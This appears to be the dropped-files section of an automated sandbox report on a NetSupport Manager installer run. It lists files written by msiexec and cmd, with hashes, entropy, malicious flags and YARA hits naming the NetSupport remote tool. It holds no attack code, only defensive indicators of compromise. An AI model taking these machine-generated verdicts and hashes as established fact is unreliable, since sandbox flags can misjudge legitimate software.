                                                                                                                    Entropy (8bit):3.6462235351457646
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q+4aVzvlXZMe5C6izCKaOPQ40bdpYm2o2nLCSm2TlCEtIlLlDtIloszlu:Q+LvjFihPQldjLG2Smi4EsDFyQ
                                                                                                                    MD5:9ADACE2EE6491BB7727E33B26D08EE21
                                                                                                                    SHA1:74F56456E8190F259D689D4FE9EC396989534010
                                                                                                                    SHA-256:440EA24D4A48DE2737817492926A97457151DC3BEB71BA66207AC33CBBC8F7D3
                                                                                                                    SHA-512:CD5FA2E207ED2A29A1E18F05374276D5528B5270B68E94F45F9819605192A4081B2394CAA6EF07B1B5D407EA0BBE153E825213F13C1CBB75681158A3827F48AD
                                                                                                                    Malicious:false
                                                                                                                    Preview:[GeneralInfo]..PathToISBEW64Exe=....[KeyList]..FileKey1=icoviewer.dll..Count=1....[icoviewer.dll]..FileKey=icoviewer.dll..FullPath=C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll..Component=IcoViewer.dll..RegCmdLine=..UnRegCmdLine=..ActionState=2..64Bit=No..Cost=1..Order=32600..Failed=No..HRESULT=0..
                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):433152
                                                                                                                    Entropy (8bit):5.502549953174867
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                                                                    MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                                                                    SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                                                                    SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\3b1425.msi, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\3b1428.msi, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):173816
                                                                                                                    Entropy (8bit):6.23179846686102
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:CfxQXjgrNmFy/E9XFPaKON5hqTYYPOaLId+MSBFskIvE51+VMA1:CfuzgrNW5iKQ5hdIVqdzGry
                                                                                                                    MD5:0E6FDA2B8425C9513C774CF29A1BC72D
                                                                                                                    SHA1:A79FFA24CB5956398DED44DA24793A2067B85DD0
                                                                                                                    SHA-256:E946B2FAE0B36C43064463A8C16A2774ADAC30C4188C5AF90E9338B903C501C9
                                                                                                                    SHA-512:285BB7759A1214ABED36162AC8BE2D48DF17A05278C4DE97562448E20FD43B635563A6819F37E23D92A5F5ED0205A68BFFE43DAC0D3A67513BD0303B4E7F89AA
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1BA9.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1BC9.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI1C08.tmp, Author: Joe Security
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):156928
                                                                                                                    Entropy (8bit):6.027765050560978
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:7tq45H7fN+qN7TyL3zyRVPkF5ka2ACEJ2dZYUdmaw+6JcKsWjcdl3K0ud9nB9U9S:hq41fALwolSsCZhdVw+6C1K0udFPI1g
                                                                                                                    MD5:A1B7850763AF9593B66EE459A081BDDF
                                                                                                                    SHA1:6E45955FAE2B2494902A1B55A3873E542F0F5CE4
                                                                                                                    SHA-256:41B8E92DEBA5206C78817236ED7F44DF95636CA748D95FAB05F032F5AEC186AF
                                                                                                                    SHA-512:A87A302A9A0D19D7CE293B42F5E7BC09664B21307A5321F226157FCC57EB2DF2B59C6651878CB23969A182C82B55E8671FF00F8462194B81A907974A49CB25B1
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI222E.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23B6.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23F5.tmp, Author: Joe Security
